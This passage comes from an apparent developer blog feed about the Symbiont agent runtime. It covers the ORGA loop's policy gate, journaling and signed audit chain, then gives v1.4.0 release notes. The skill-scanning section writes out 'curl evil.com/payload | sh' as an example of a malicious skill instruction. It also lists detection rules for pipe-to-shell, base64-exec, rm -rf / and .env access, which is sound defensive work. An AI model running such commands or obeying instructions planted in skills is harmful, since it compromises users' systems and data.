<span class="k">impl</span> <span class="n">AgentLoop</span><span class="o">&lt;</span><span class="n">PolicyCheck</span><span class="o">&gt;</span> <span class="p">{</span>
    <span class="k">pub</span> <span class="k">async</span> <span class="k">fn</span> <span class="nf">check_policy</span><span class="p">(</span><span class="k">self</span><span class="p">,</span> <span class="n">gate</span><span class="p">:</span> <span class="o">&amp;</span><span class="k">dyn</span> <span class="n">ReasoningPolicyGate</span><span class="p">)</span>
        <span class="k">-&gt;</span> <span class="nb">Result</span><span class="o">&lt;</span><span class="n">AgentLoop</span><span class="o">&lt;</span><span class="n">ToolDispatching</span><span class="o">&gt;</span><span class="p">,</span> <span class="n">LoopTermination</span><span class="o">&gt;</span><span class="p">;</span>
<span class="p">}</span>

<span class="k">impl</span> <span class="n">AgentLoop</span><span class="o">&lt;</span><span class="n">ToolDispatching</span><span class="o">&gt;</span> <span class="p">{</span>
    <span class="k">pub</span> <span class="k">async</span> <span class="k">fn</span> <span class="nf">dispatch_tools</span><span class="p">(</span><span class="k">self</span><span class="p">,</span> <span class="o">...</span><span class="p">)</span>
        <span class="k">-&gt;</span> <span class="nb">Result</span><span class="o">&lt;</span><span class="n">AgentLoop</span><span class="o">&lt;</span><span class="n">Observing</span><span class="o">&gt;</span><span class="p">,</span> <span class="n">LoopTermination</span><span class="o">&gt;</span><span class="p">;</span>
<span class="p">}</span>

<span class="k">impl</span> <span class="n">AgentLoop</span><span class="o">&lt;</span><span class="n">Observing</span><span class="o">&gt;</span> <span class="p">{</span>
    <span class="k">pub</span> <span class="k">fn</span> <span class="nf">observe_results</span><span class="p">(</span><span class="k">self</span><span class="p">)</span> <span class="k">-&gt;</span> <span class="n">LoopContinuation</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Each transition method is only defined on its phase type. <code class="language-plaintext highlighter-rouge">AgentLoop&lt;Reasoning&gt;</code> has <code class="language-plaintext highlighter-rouge">produce_output()</code> but not <code class="language-plaintext highlighter-rouge">dispatch_tools()</code>. <code class="language-plaintext highlighter-rouge">AgentLoop&lt;ToolDispatching&gt;</code> has <code class="language-plaintext highlighter-rouge">dispatch_tools()</code> but not <code class="language-plaintext highlighter-rouge">check_policy()</code>. The move semantics mean the old phase is consumed — you can’t hold onto both sides of a transition.</p>

<p>Invalid phase orderings aren’t runtime errors. They’re compile errors. You literally cannot write code that skips the Gate.</p>

<h3 id="2-policy-as-phase">2. Policy-as-Phase</h3>

<p>The Gate is implemented through the <code class="language-plaintext highlighter-rouge">ReasoningPolicyGate</code> trait:</p>

<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nd">#[async_trait]</span>
<span class="k">pub</span> <span class="k">trait</span> <span class="n">ReasoningPolicyGate</span><span class="p">:</span> <span class="nb">Send</span> <span class="o">+</span> <span class="nb">Sync</span> <span class="p">{</span>
    <span class="k">async</span> <span class="k">fn</span> <span class="nf">evaluate_action</span><span class="p">(</span>
        <span class="o">&amp;</span><span class="k">self</span><span class="p">,</span>
        <span class="n">agent_id</span><span class="p">:</span> <span class="o">&amp;</span><span class="n">AgentId</span><span class="p">,</span>
        <span class="n">action</span><span class="p">:</span> <span class="o">&amp;</span><span class="n">ProposedAction</span><span class="p">,</span>
        <span class="n">state</span><span class="p">:</span> <span class="o">&amp;</span><span class="n">LoopState</span><span class="p">,</span>
    <span class="p">)</span> <span class="k">-&gt;</span> <span class="n">LoopDecision</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Every action the LLM proposes — tool calls, delegations, responses, terminations — is submitted to the gate. The gate returns one of three decisions:</p>

<ul>
  <li><strong>Allow</strong>: Action proceeds to dispatch</li>
  <li><strong>Deny</strong>: Action is blocked, and the denial reason is fed back to the LLM as an observation</li>
  <li><strong>Modify</strong>: Action is structurally rewritten — the gate returns a new <code class="language-plaintext highlighter-rouge">ProposedAction</code> that replaces the original in the dispatch queue. This is used for parameter redaction (e.g., stripping sensitive fields before a tool call reaches an external API) while preserving the action’s intent.</li>
</ul>

<p>The denial feedback loop is key. A denied action doesn’t crash the agent or terminate the loop. The LLM learns <em>why</em> the action was denied and can try a different approach. The agent self-corrects within policy boundaries.</p>

<p>Symbiont ships three gate implementations:</p>

<table>
  <thead>
    <tr>
      <th>Gate</th>
      <th>Use Case</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td><code class="language-plaintext highlighter-rouge">DefaultPolicyGate</code></td>
      <td>Delegates to the DSL policy engine</td>
    </tr>
    <tr>
      <td><code class="language-plaintext highlighter-rouge">CedarPolicyGate</code></td>
      <td>Formal authorization via AWS Cedar policies</td>
    </tr>
    <tr>
      <td><code class="language-plaintext highlighter-rouge">ToolFilterPolicyGate</code></td>
      <td>Simple allowlist/denylist for tool names</td>
    </tr>
  </tbody>
</table>

<p>A Cedar policy example:</p>

<pre><code class="language-cedar">// Allow all agents to respond to users
permit(principal, action == Action::"respond", resource);

// Forbid any agent from calling the delete tool
forbid(principal, action == Action::"tool_call::delete_production_db", resource);
</code></pre>

<p>Note: Symbiont uses the Cedar policy language directly. If you’re using AWS Verified Permissions (which adds its own constraints on top of Cedar), you’ll need to scope principal and resource types to satisfy its stricter validation rules.</p>

<p>The gate is never optional. Even with no explicit policy configured, a <code class="language-plaintext highlighter-rouge">DefaultPolicyGate</code> evaluates every action. The zero-policy case is “allow all” — but it’s still <em>evaluated</em>, still journaled, still auditable.</p>

<h3 id="3-durable-journaling">3. Durable Journaling</h3>

<p>Every phase transition emits a journal entry:</p>

<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">pub</span> <span class="k">struct</span> <span class="n">JournalEntry</span> <span class="p">{</span>
    <span class="k">pub</span> <span class="n">sequence</span><span class="p">:</span> <span class="nb">u64</span><span class="p">,</span>
    <span class="k">pub</span> <span class="n">timestamp</span><span class="p">:</span> <span class="n">DateTime</span><span class="o">&lt;</span><span class="n">Utc</span><span class="o">&gt;</span><span class="p">,</span>
    <span class="k">pub</span> <span class="n">agent_id</span><span class="p">:</span> <span class="n">AgentId</span><span class="p">,</span>
    <span class="k">pub</span> <span class="n">iteration</span><span class="p">:</span> <span class="nb">u32</span><span class="p">,</span>
    <span class="k">pub</span> <span class="n">event</span><span class="p">:</span> <span class="n">LoopEvent</span><span class="p">,</span>
<span class="p">}</span>

<span class="k">pub</span> <span class="k">enum</span> <span class="n">LoopEvent</span> <span class="p">{</span>
    <span class="n">Started</span> <span class="p">{</span> <span class="n">agent_id</span><span class="p">:</span> <span class="n">AgentId</span><span class="p">,</span> <span class="n">config</span><span class="p">:</span> <span class="n">LoopConfig</span> <span class="p">},</span>
    <span class="n">ReasoningComplete</span> <span class="p">{</span> <span class="n">iteration</span><span class="p">:</span> <span class="nb">u32</span><span class="p">,</span> <span class="n">actions</span><span class="p">:</span> <span class="nb">Vec</span><span class="o">&lt;</span><span class="n">ProposedAction</span><span class="o">&gt;</span><span class="p">,</span> <span class="n">usage</span><span class="p">:</span> <span class="n">Usage</span> <span class="p">},</span>
    <span class="n">PolicyEvaluated</span> <span class="p">{</span> <span class="n">iteration</span><span class="p">:</span> <span class="nb">u32</span><span class="p">,</span> <span class="n">action_count</span><span class="p">:</span> <span class="nb">usize</span><span class="p">,</span> <span class="n">denied_count</span><span class="p">:</span> <span class="nb">usize</span> <span class="p">},</span>
    <span class="n">ToolsDispatched</span> <span class="p">{</span> <span class="n">iteration</span><span class="p">:</span> <span class="nb">u32</span><span class="p">,</span> <span class="n">tool_count</span><span class="p">:</span> <span class="nb">usize</span><span class="p">,</span> <span class="n">duration</span><span class="p">:</span> <span class="n">Duration</span> <span class="p">},</span>
    <span class="n">ObservationsCollected</span> <span class="p">{</span> <span class="n">iteration</span><span class="p">:</span> <span class="nb">u32</span><span class="p">,</span> <span class="n">observation_count</span><span class="p">:</span> <span class="nb">usize</span> <span class="p">},</span>
    <span class="n">Terminated</span> <span class="p">{</span> <span class="n">reason</span><span class="p">:</span> <span class="n">TerminationReason</span><span class="p">,</span> <span class="n">iterations</span><span class="p">:</span> <span class="nb">u32</span><span class="p">,</span> <span class="n">total_usage</span><span class="p">:</span> <span class="n">Usage</span><span class="p">,</span> <span class="n">duration</span><span class="p">:</span> <span class="n">Duration</span> <span class="p">},</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Journal writes happen immediately after each phase completes, before the next phase begins. This means a crashed loop can recover from the last completed phase without re-invoking the LLM. If the agent crashes after <code class="language-plaintext highlighter-rouge">ReasoningComplete</code> is persisted but before policy evaluation runs, the recovery path knows the LLM’s proposed actions and can resume from the policy check. For tool dispatch specifically, the <code class="language-plaintext highlighter-rouge">DurableJournal</code> records intent before dispatch and completion after, so side-effectful tools can use idempotency keys to avoid double-execution on recovery.</p>

<p>Two journal backends ship with the runtime:</p>

<ul>
  <li><strong><code class="language-plaintext highlighter-rouge">BufferedJournal</code></strong>: In-memory ring buffer (default, fast, ephemeral)</li>
  <li><strong><code class="language-plaintext highlighter-rouge">DurableJournal</code></strong>: Persistent storage via a pluggable <code class="language-plaintext highlighter-rouge">JournalStorage</code> trait for production workloads</li>
</ul>

<p>The journal is also the foundation for observability. Every iteration’s token usage, tool dispatch latency, policy denial count, and termination reason is recorded. You don’t need to instrument the loop — the loop instruments itself.</p>

<h3 id="4-cryptographic-audit">4. Cryptographic Audit</h3>

<p>For high-assurance deployments, Symbiont extends journaling with a hash-chained, Ed25519-signed audit trail:</p>

<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">pub</span> <span class="k">struct</span> <span class="n">CriticAuditEntry</span> <span class="p">{</span>
    <span class="k">pub</span> <span class="n">entry_id</span><span class="p">:</span> <span class="nb">String</span><span class="p">,</span>
    <span class="k">pub</span> <span class="n">director_output_hash</span><span class="p">:</span> <span class="nb">String</span><span class="p">,</span>    <span class="c1">// SHA-256 of LLM output</span>
    <span class="k">pub</span> <span class="n">critic_assessment_hash</span><span class="p">:</span> <span class="nb">String</span><span class="p">,</span>  <span class="c1">// SHA-256 of evaluation</span>
    <span class="k">pub</span> <span class="n">verdict</span><span class="p">:</span> <span class="n">AuditVerdict</span><span class="p">,</span>           <span class="c1">// Approved, Rejected, NeedsRevision</span>
    <span class="k">pub</span> <span class="n">chain_hash</span><span class="p">:</span> <span class="nb">String</span><span class="p">,</span>              <span class="c1">// SHA-256(prev_hash || entry_data)</span>
    <span class="k">pub</span> <span class="n">signature</span><span class="p">:</span> <span class="nb">String</span><span class="p">,</span>               <span class="c1">// Ed25519 over chain_hash</span>
    <span class="k">pub</span> <span class="n">timestamp</span><span class="p">:</span> <span class="n">DateTime</span><span class="o">&lt;</span><span class="n">Utc</span><span class="o">&gt;</span><span class="p">,</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Each entry’s <code class="language-plaintext highlighter-rouge">chain_hash</code> is computed from the previous entry’s hash concatenated with the current entry’s data (serialized canonically to avoid encoding ambiguity), then signed with Ed25519. This creates a tamper-evident hash chain: modifying any entry invalidates all subsequent signatures.</p>

<p>Verification recomputes the chain from genesis and checks every signature:</p>

<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">pub</span> <span class="k">fn</span> <span class="nf">verify_chain</span><span class="p">(</span>
    <span class="n">entries</span><span class="p">:</span> <span class="o">&amp;</span><span class="p">[</span><span class="n">CriticAuditEntry</span><span class="p">],</span>
    <span class="n">verifying_key</span><span class="p">:</span> <span class="o">&amp;</span><span class="n">VerifyingKey</span><span class="p">,</span>
<span class="p">)</span> <span class="k">-&gt;</span> <span class="nb">Result</span><span class="o">&lt;</span><span class="p">(),</span> <span class="n">AuditError</span><span class="o">&gt;</span>
</code></pre></div></div>

<p>If an entry has been modified, inserted, deleted, or reordered, verification fails with the exact index of the first inconsistency. This isn’t just logging — it’s a cryptographic proof of what the agent did, in what order, and what policy decisions were made.</p>

<h2 id="how-it-all-fits-together">How It All Fits Together</h2>

<p>The <code class="language-plaintext highlighter-rouge">ReasoningLoopRunner</code> orchestrates the full cycle:</p>

<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">async</span> <span class="k">fn</span> <span class="nf">run_inner</span><span class="p">(</span><span class="o">&amp;</span><span class="k">self</span><span class="p">,</span> <span class="n">state</span><span class="p">:</span> <span class="n">LoopState</span><span class="p">,</span> <span class="n">config</span><span class="p">:</span> <span class="n">LoopConfig</span><span class="p">)</span> <span class="k">-&gt;</span> <span class="n">LoopResult</span> <span class="p">{</span>
    <span class="k">let</span> <span class="n">agent_id</span> <span class="o">=</span> <span class="n">state</span><span class="py">.agent_id</span><span class="p">;</span>
    <span class="k">let</span> <span class="k">mut</span> <span class="n">current_loop</span> <span class="o">=</span> <span class="nn">AgentLoop</span><span class="p">::</span><span class="o">&lt;</span><span class="n">Reasoning</span><span class="o">&gt;</span><span class="p">::</span><span class="nf">new</span><span class="p">(</span><span class="n">state</span><span class="p">,</span> <span class="n">config</span><span class="p">);</span>

    <span class="k">loop</span> <span class="p">{</span>
        <span class="c1">// OBSERVE: inject knowledge, manage context</span>
        <span class="k">if</span> <span class="k">let</span> <span class="nf">Some</span><span class="p">(</span><span class="k">ref</span> <span class="n">bridge</span><span class="p">)</span> <span class="o">=</span> <span class="k">self</span><span class="py">.knowledge_bridge</span> <span class="p">{</span>
            <span class="n">bridge</span><span class="nf">.inject_context</span><span class="p">(</span><span class="o">&amp;</span><span class="n">agent_id</span><span class="p">,</span> <span class="o">&amp;</span><span class="k">mut</span> <span class="n">current_loop</span><span class="py">.state.conversation</span><span class="p">)</span><span class="k">.await</span><span class="nf">.ok</span><span class="p">();</span>
        <span class="p">}</span>

        <span class="c1">// REASON: call inference provider</span>
        <span class="k">let</span> <span class="n">policy_phase</span> <span class="o">=</span> <span class="n">current_loop</span>
            <span class="nf">.produce_output</span><span class="p">(</span><span class="k">self</span><span class="py">.provider</span><span class="nf">.as_ref</span><span class="p">(),</span> <span class="k">self</span><span class="py">.context_manager</span><span class="nf">.as_ref</span><span class="p">())</span>
            <span class="k">.await</span><span class="o">?</span><span class="p">;</span>
        <span class="k">self</span><span class="py">.journal</span><span class="nf">.append</span><span class="p">(</span><span class="cm">/* ReasoningComplete */</span><span class="p">)</span><span class="k">.await</span><span class="p">;</span>

        <span class="c1">// GATE: evaluate every proposed action</span>
        <span class="k">let</span> <span class="n">dispatch_phase</span> <span class="o">=</span> <span class="n">policy_phase</span>
            <span class="nf">.check_policy</span><span class="p">(</span><span class="k">self</span><span class="py">.policy_gate</span><span class="nf">.as_ref</span><span class="p">())</span>
            <span class="k">.await</span><span class="o">?</span><span class="p">;</span>
        <span class="k">self</span><span class="py">.journal</span><span class="nf">.append</span><span class="p">(</span><span class="cm">/* PolicyEvaluated */</span><span class="p">)</span><span class="k">.await</span><span class="p">;</span>

        <span class="c1">// ACT: execute approved actions</span>
        <span class="k">let</span> <span class="n">observe_phase</span> <span class="o">=</span> <span class="n">dispatch_phase</span>
            <span class="nf">.dispatch_tools</span><span class="p">(</span><span class="k">self</span><span class="py">.executor</span><span class="nf">.as_ref</span><span class="p">(),</span> <span class="k">self</span><span class="py">.circuit_breakers</span><span class="nf">.as_ref</span><span class="p">())</span>
            <span class="k">.await</span><span class="o">?</span><span class="p">;</span>
        <span class="k">self</span><span class="py">.journal</span><span class="nf">.append</span><span class="p">(</span><span class="cm">/* ToolsDispatched */</span><span class="p">)</span><span class="k">.await</span><span class="p">;</span>

        <span class="c1">// OBSERVE: decide whether to continue or terminate</span>
        <span class="k">match</span> <span class="n">observe_phase</span><span class="nf">.observe_results</span><span class="p">()</span> <span class="p">{</span>
            <span class="nn">LoopContinuation</span><span class="p">::</span><span class="nf">Continue</span><span class="p">(</span><span class="n">next</span><span class="p">)</span> <span class="k">=&gt;</span> <span class="n">current_loop</span> <span class="o">=</span> <span class="o">*</span><span class="n">next</span><span class="p">,</span>
            <span class="nn">LoopContinuation</span><span class="p">::</span><span class="nf">Complete</span><span class="p">(</span><span class="n">result</span><span class="p">)</span> <span class="k">=&gt;</span> <span class="k">return</span> <span class="n">result</span><span class="p">,</span>
        <span class="p">}</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Notice the type transitions: <code class="language-plaintext highlighter-rouge">current_loop</code> starts as <code class="language-plaintext highlighter-rouge">AgentLoop&lt;Reasoning&gt;</code>, becomes <code class="language-plaintext highlighter-rouge">AgentLoop&lt;PolicyCheck&gt;</code> after reasoning, becomes <code class="language-plaintext highlighter-rouge">AgentLoop&lt;ToolDispatching&gt;</code> after the gate, becomes <code class="language-plaintext highlighter-rouge">AgentLoop&lt;Observing&gt;</code> after dispatch, and then either becomes a fresh <code class="language-plaintext highlighter-rouge">AgentLoop&lt;Reasoning&gt;</code> for the next iteration or terminates.</p>

<p>The builder enforces required dependencies at compile time too:</p>

<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">let</span> <span class="n">runner</span> <span class="o">=</span> <span class="nn">ReasoningLoopRunner</span><span class="p">::</span><span class="nf">builder</span><span class="p">()</span>
    <span class="nf">.provider</span><span class="p">(</span><span class="n">cloud_provider</span><span class="p">)</span>     <span class="c1">// Required — won't compile without</span>
    <span class="nf">.executor</span><span class="p">(</span><span class="n">tool_executor</span><span class="p">)</span>      <span class="c1">// Required — won't compile without</span>
    <span class="nf">.policy_gate</span><span class="p">(</span><span class="n">cedar_gate</span><span class="p">)</span>      <span class="c1">// Optional — defaults to permissive</span>
    <span class="nf">.journal</span><span class="p">(</span><span class="n">durable_journal</span><span class="p">)</span>     <span class="c1">// Optional — defaults to in-memory</span>
    <span class="nf">.build</span><span class="p">();</span>
</code></pre></div></div>

<h2 id="why-this-combination-matters">Why This Combination Matters</h2>

<p>Each of these techniques exists independently. Typestate patterns are well-known in Rust (and have been applied in robotics and concurrent systems). Policy engines are commodity. Append-only logs are everywhere. Hash chains are textbook cryptography.</p>

<p>The novelty is combining all four into a single agent runtime primitive where:</p>

<ul>
  <li><strong>Phase ordering is compile-time</strong>: You can’t write an agent that skips policy</li>
  <li><strong>Policy is a phase</strong>: Not middleware, not a hook — a mandatory state transition</li>
  <li><strong>Every transition is journaled</strong>: Crash recovery without LLM re-invocation</li>
  <li><strong>The journal is cryptographically chained</strong>: Tamper-evident proof of agent behavior</li>
</ul>

<p>No existing agent framework provides all four. Most provide zero or one. The result is a runtime where “the agent did X without authorization” is not a failure mode — it’s a type error, for any code path that goes through the ORGA API.</p>

<p>To be precise: this guarantee covers actions executed via the reasoning loop. Defense-in-depth still applies at the tool boundary — least-privilege credentials, network egress controls, and sandboxing remain important for the external services that tools invoke. ORGA ensures the agent runtime itself cannot skip policy; it doesn’t replace infrastructure-level controls on what those tools can reach.</p>

<p>There is a cost: every iteration runs a policy evaluation and a journal write, even when the policy is permissive. In practice, these are microsecond-scale operations against the seconds-scale latency of LLM inference, so the overhead is negligible. Cryptographic signing (for the audit chain) is more expensive and is opt-in for deployments that need tamper-evident logs. The runtime also includes per-tool circuit breakers and configurable concurrency limits to handle partial failures without cascading into the rest of the agent fleet.</p>

<h2 id="getting-started">Getting Started</h2>

<p>Symbiont is open source under the Apache 2.0 license:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># Install</span>
cargo <span class="nb">install </span>symbi

<span class="c"># Or via Docker</span>
docker pull ghcr.io/thirdkeyai/symbi:latest
</code></pre></div></div>

<p>The ORGA loop is the core of every agent built with Symbiont — from simple tool-calling assistants to fleet-managed autonomous agents with external integrations.</p>

<ul>
  <li><strong>Source</strong>: <a href="https://github.com/thirdkeyai/symbiont">github.com/thirdkeyai/symbiont</a></li>
  <li><strong>Documentation</strong>: <a href="https://symbiont.dev">symbiont.dev</a></li>
  <li><strong>SDKs</strong>: <a href="https://pypi.org/project/symbiont-sdk/">Python</a> and <a href="https://www.npmjs.com/package/symbiont-sdk-js">JavaScript</a> wrappers available</li>
</ul>

<hr />

<p><em>ORGA is part of the <a href="https://symbiont.dev">Symbiont</a> agent runtime, built by <a href="https://thirdkey.ai">ThirdKey AI</a>. It integrates with <a href="https://schemapin.org">SchemaPin</a> for tool integrity and <a href="https://agentpin.org">AgentPin</a> for cryptographic agent identity.</em></p>]]></content><author><name>ThirdKey Team</name></author><category term="AI Security" /><category term="Architecture" /><category term="Agent Runtime" /><category term="symbiont" /><category term="orga" /><category term="typestate" /><category term="policy" /><category term="reasoning loop" /><category term="rust" /><category term="agent architecture" /><category term="zero trust" /><summary type="html"><![CDATA[Every agent framework has a loop. Call the LLM, parse the tool calls, execute them, feed the results back. ReAct, AutoGPT, LangGraph, CrewAI — the shape is always the same. What differs is what happens when things go wrong, and more importantly, what can’t happen at all.]]></summary></entry><entry><title type="html">Symbiont v1.4.0 — Persistent Memory, Webhook Verification, and Skill Scanning</title><link href="http://research.thirdkey.ai/blog/symbiont-v1-4-0-release/" rel="alternate" type="text/html" title="Symbiont v1.4.0 — Persistent Memory, Webhook Verification, and Skill Scanning" /><published>2026-02-16T00:00:00+00:00</published><updated>2026-02-16T00:00:00+00:00</updated><id>http://research.thirdkey.ai/blog/symbiont-v1-4-0-release</id><content type="html" xml:base="http://research.thirdkey.ai/blog/symbiont-v1-4-0-release/"><![CDATA[<p>Symbiont v1.4.0 is here. This release adds four major capabilities to the agent runtime: persistent agent memory, cryptographic webhook verification, automated skill scanning, and metrics telemetry. Together, they close the gap between “agent that runs” and “agent you can trust in production.”</p>

<p>Every feature is available in the Rust runtime and the <a href="https://pypi.org/project/symbiont-sdk/0.6.0/">Python</a> and <a href="https://www.npmjs.com/package/symbiont-sdk-js">JavaScript</a> SDKs (both at v0.6.0).</p>

<h2 id="persistent-memory">Persistent Memory</h2>

<p>Agents that forget everything between runs aren’t useful for long-running workflows. v1.4.0 introduces <code class="language-plaintext highlighter-rouge">MarkdownMemoryStore</code> — a file-based persistence layer that stores agent knowledge in human-readable Markdown.</p>

<p>Each agent gets a memory file organized into three sections:</p>

<ul>
  <li><strong>Facts</strong>: Static knowledge the agent has learned (“The production database is on port 5432”)</li>
  <li><strong>Procedures</strong>: Step-by-step processes the agent has figured out (“To deploy: run tests, build image, push to registry”)</li>
  <li><strong>Learned Patterns</strong>: Behavioral observations (“User prefers concise summaries over detailed reports”)</li>
</ul>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>agent security_scanner {
    memory {
        store markdown
        path  "./data/scanner"
        retention 90d
    }
}
</code></pre></div></div>

<p>Writes are atomic (tempfile + rename), so a crash mid-write never corrupts existing memory. Daily interaction logs are appended to timestamped files, and a configurable retention policy automatically compacts old logs. The REPL exposes <code class="language-plaintext highlighter-rouge">:memory inspect</code>, <code class="language-plaintext highlighter-rouge">:memory compact</code>, and <code class="language-plaintext highlighter-rouge">:memory purge</code> commands for runtime management.</p>

<p>The Markdown format is intentional — operators can read, edit, and audit agent memory with any text editor. No proprietary binary formats, no database to manage.</p>

<h2 id="webhook-verification">Webhook Verification</h2>

<p>Accepting webhooks from external services without verifying signatures is a vulnerability. v1.4.0 adds a <code class="language-plaintext highlighter-rouge">SignatureVerifier</code> trait with two implementations and four provider presets:</p>

<table>
  <thead>
    <tr>
      <th>Provider</th>
      <th>Header</th>
      <th>Signing Scheme</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>GitHub</td>
      <td><code class="language-plaintext highlighter-rouge">X-Hub-Signature-256</code></td>
      <td>HMAC-SHA256 with <code class="language-plaintext highlighter-rouge">sha256=</code> prefix</td>
    </tr>
    <tr>
      <td>Stripe</td>
      <td><code class="language-plaintext highlighter-rouge">Stripe-Signature</code></td>
      <td>HMAC-SHA256</td>
    </tr>
    <tr>
      <td>Slack</td>
      <td><code class="language-plaintext highlighter-rouge">X-Slack-Signature</code></td>
      <td>HMAC-SHA256 with <code class="language-plaintext highlighter-rouge">v0=</code> prefix</td>
    </tr>
    <tr>
      <td>Custom</td>
      <td><code class="language-plaintext highlighter-rouge">X-Signature</code></td>
      <td>HMAC-SHA256</td>
    </tr>
  </tbody>
</table>

<p>All HMAC comparisons use constant-time operations via the <code class="language-plaintext highlighter-rouge">subtle</code> crate — no timing side channels. A <code class="language-plaintext highlighter-rouge">JwtVerifier</code> is also included for services that authenticate via JWT tokens in headers.</p>

<p>The DSL now supports a <code class="language-plaintext highlighter-rouge">webhook</code> block for declarative endpoint configuration:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>agent github_handler {
    webhook {
        provider github
        secret   $GITHUB_WEBHOOK_SECRET
        path     "/hooks/github"
        filter   ["push", "pull_request"]
    }
}
</code></pre></div></div>

<p>Verification happens before JSON parsing in the HTTP input pipeline. Invalid signatures get a 401 immediately — the agent never sees the payload. This is wired into the <code class="language-plaintext highlighter-rouge">HttpInputServer</code> as a pre-handler middleware, so there’s zero boilerplate to add webhook security to any agent.</p>

<h2 id="skill-scanning-clawhavoc">Skill Scanning (ClawHavoc)</h2>

<p>Agent skills — SKILL.md files and their associated resources — are a supply chain attack surface. A skill that includes <code class="language-plaintext highlighter-rouge">curl evil.com/payload | sh</code> in its instructions can turn a helpful agent into a compromised one.</p>

<p>v1.4.0 ships a <code class="language-plaintext highlighter-rouge">SkillScanner</code> with 10 built-in <strong>ClawHavoc</strong> defense rules:</p>

<table>
  <thead>
    <tr>
      <th>Rule</th>
      <th>Severity</th>
      <th>What It Catches</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td><code class="language-plaintext highlighter-rouge">pipe-to-shell</code></td>
      <td>Critical</td>
      <td><code class="language-plaintext highlighter-rouge">curl ... \| sh</code></td>
    </tr>
    <tr>
      <td><code class="language-plaintext highlighter-rouge">wget-pipe-to-shell</code></td>
      <td>Critical</td>
      <td><code class="language-plaintext highlighter-rouge">wget ... \| sh</code></td>
    </tr>
    <tr>
      <td><code class="language-plaintext highlighter-rouge">env-file-reference</code></td>
      <td>Warning</td>
      <td>References to <code class="language-plaintext highlighter-rouge">.env</code> files</td>
    </tr>
    <tr>
      <td><code class="language-plaintext highlighter-rouge">soul-md-modification</code></td>
      <td>Critical</td>
      <td>Attempts to rewrite <code class="language-plaintext highlighter-rouge">SOUL.md</code></td>
    </tr>
    <tr>
      <td><code class="language-plaintext highlighter-rouge">memory-md-modification</code></td>
      <td>Critical</td>
      <td>Attempts to rewrite <code class="language-plaintext highlighter-rouge">MEMORY.md</code></td>
    </tr>
    <tr>
      <td><code class="language-plaintext highlighter-rouge">eval-with-fetch</code></td>
      <td>Critical</td>
      <td><code class="language-plaintext highlighter-rouge">eval()</code> + network fetch</td>
    </tr>
    <tr>
      <td><code class="language-plaintext highlighter-rouge">fetch-with-eval</code></td>
      <td>Critical</td>
      <td>Network fetch + <code class="language-plaintext highlighter-rouge">eval()</code></td>
    </tr>
    <tr>
      <td><code class="language-plaintext highlighter-rouge">base64-decode-exec</code></td>
      <td>Critical</td>
      <td>Base64 decode piped to shell</td>
    </tr>
    <tr>
      <td><code class="language-plaintext highlighter-rouge">rm-rf-pattern</code></td>
      <td>Critical</td>
      <td><code class="language-plaintext highlighter-rouge">rm -rf /</code></td>
    </tr>
    <tr>
      <td><code class="language-plaintext highlighter-rouge">chmod-777</code></td>
      <td>Warning</td>
      <td>World-writable permissions</td>
    </tr>
  </tbody>
</table>

<p>The scanner runs automatically when skills are loaded. Every text file in the skill directory is scanned line-by-line against all rules. Findings include the rule name, severity, a human-readable message, and the exact line number.</p>

<p>Custom rules can be added alongside the defaults. If your organization has domain-specific patterns to watch for — AWS credential patterns, internal URL schemes, or proprietary file references — add them as regex rules and they’ll be checked alongside ClawHavoc.</p>

<p>The scanner integrates with <a href="https://schemapin.org">SchemaPin</a> for cryptographic skill verification. A skill can be both signature-verified (the author is who they claim to be) and content-scanned (the instructions don’t contain malicious patterns). Belt and suspenders.</p>

<h2 id="http-security-hardening">HTTP Security Hardening</h2>

<p>v1.4.0 tightens the HTTP input module defaults:</p>

<ul>
  <li><strong>Loopback-only binding</strong>: The server now defaults to <code class="language-plaintext highlighter-rouge">127.0.0.1</code> instead of <code class="language-plaintext highlighter-rouge">0.0.0.0</code>. If you want to accept external connections, you explicitly opt in.</li>
  <li><strong>CORS disabled by default</strong>: <code class="language-plaintext highlighter-rouge">cors_origins</code> is an empty list by default. Add specific origins to enable cross-origin access — no more accidental wildcard CORS.</li>
  <li><strong>JWT EdDSA validation</strong>: The auth middleware now supports Ed25519 public key loading and EdDSA JWT verification. HS256, RS256, and other algorithms are explicitly rejected.</li>
  <li><strong>Health endpoint separation</strong>: <code class="language-plaintext highlighter-rouge">/health</code> is exempt from authentication, allowing load balancers to probe the server without credentials.</li>
  <li><strong>PathPrefix routing</strong>: <code class="language-plaintext highlighter-rouge">RouteMatch::PathPrefix</code> enables routing by URL path prefix, complementing the existing header and JSON field matchers.</li>
</ul>

<p>These are all “secure by default” changes. The goal is that a fresh <code class="language-plaintext highlighter-rouge">HttpInputConfig::default()</code> is production-safe without any additional configuration.</p>

<h2 id="metrics--telemetry">Metrics &amp; Telemetry</h2>

<p>Production systems need observability. v1.4.0 adds a metrics collection and export system:</p>

<ul>
  <li><strong><code class="language-plaintext highlighter-rouge">FileMetricsExporter</code></strong>: Writes metric snapshots as atomic JSON files (tempfile + rename). Simple, no external dependencies.</li>
  <li><strong><code class="language-plaintext highlighter-rouge">OtlpExporter</code></strong>: Sends metrics to any OpenTelemetry-compatible endpoint via gRPC or HTTP (behind the <code class="language-plaintext highlighter-rouge">metrics</code> feature flag).</li>
  <li><strong><code class="language-plaintext highlighter-rouge">CompositeExporter</code></strong>: Fan-out to multiple backends simultaneously. Individual export failures are logged but don’t block other exporters.</li>
